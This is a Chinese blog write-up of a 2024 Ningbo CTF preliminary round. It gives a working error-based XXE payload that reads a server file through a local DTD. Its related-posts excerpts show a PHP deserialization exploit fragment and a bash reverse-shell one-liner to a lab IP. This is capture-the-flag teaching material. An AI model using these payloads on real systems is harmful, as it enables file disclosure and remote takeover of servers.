2024宁波市赛——天一永安杯初赛WP

发表于2024-05-04|更新于2025-05-17|学习

|浏览量:

前言

残缺的队伍配上不好打的比赛😥

web

web-1

直接看源码

1	view-source:http://139.224.232.213:30333/

1	flag{2cfde35c1735cb1abfa071e7c982659907ffd9cd}

1 2	奇葩的环境，一开始一直拒绝连接，开都开不起来，又是抢不到血的一场比赛😅

web-2

看网页源码易知是xxe漏洞

然后经过尝试，报错得到flag

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///flag">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<person><username>admin</username><password>admin</password></person>

md环境还有问题，一开始显示的是测试flag，还以为藏flag，找半天，环境重开了才正常获取了

结语

线下AWD是没希望了，嘛就这样

文章作者: lan1oc

文章链接: https://lan1oc.github.io/2024/05/04/%E8%AE%B0%E5%BD%95/ctf/2024%E5%AE%81%E6%B3%A2%E5%B8%82%E8%B5%9B%E2%80%94%E2%80%94%E5%A4%A9%E4%B8%80%E6%B0%B8%E5%AE%89%E6%9D%AF%20%E5%88%9D%E8%B5%9BWP/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog！

相关推荐

第六届浙江省网络与信息安全竞赛初赛部分wp

前言初赛名次14，太爽了，被带飞了属于是，web都是做到最后几步出不来丢给大爹🤣🤣🤣 解题情况解题过程Web1.ezphpPHP反序列化，var_dump触发BBB，通过BBB中的param1触发CCC，通过CCC中的$this->func->aaa()触发AAA执行任意代码 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phphighlight_file(___FILE___); class AAA{ public $cmd; public function __call($name, $arguments){ eval($this->cmd); return "done"; } }class BBB{ public $param1; public function...

MoeCTF 2023 部分write up

签到题hello CTFer给了个url，直接打开就有flag 然后提交就完了 WEBhttp下载一个叫WSRX的客户端连接一下开环境以后给的地址然后访问localhost:64824 然后就是完成这些任务，1、2有手就行 5就是将ua头的值换成MoeBrowser就行 3是将cookie中的character的值改为admin就行 4是在数据包添加一个字段 1X-Forwarded-For: 127.0.0.1 然后所有任务完成，flag就出了 web入门指北题目显示要解码得flag 先把附件下载下来看看，解压完是个pdf文档文档最后发现了一组神秘数字，要解码的应该就是这个了一眼十六进制，那就转字符一下，写个脚本 1234567891011original_hex_string = "66 6c 61 67 3d 62 57 39 6c 59 33 52 6d 65 33 63 7a 62 45 4e 76 62 57 56 66 56 47 39 66 62 57 39 6c 51 31 52 47 58 31 63 79 59 6c...

[THM]Pickle Rick

一上来就是脑洞网站首页源码找到用户名扫目录扫到/robots.txt给了个字符串，推测是密码登录成功来到一个执行命令的页面先看看有啥第一个flag1tac Sup3rS3cretPickl3Ingred.txt 12cat疑似被过滤第二个flag谜语人啊，clue.txt说在其他目录能找到，但又没说在哪弹shell看看 1bash -c "bash -i >& /dev/tcp/10.21.170.43/404 0>&1" 在/home/rick下找到第三个flagsudo -i直接提权了然后在/root下找到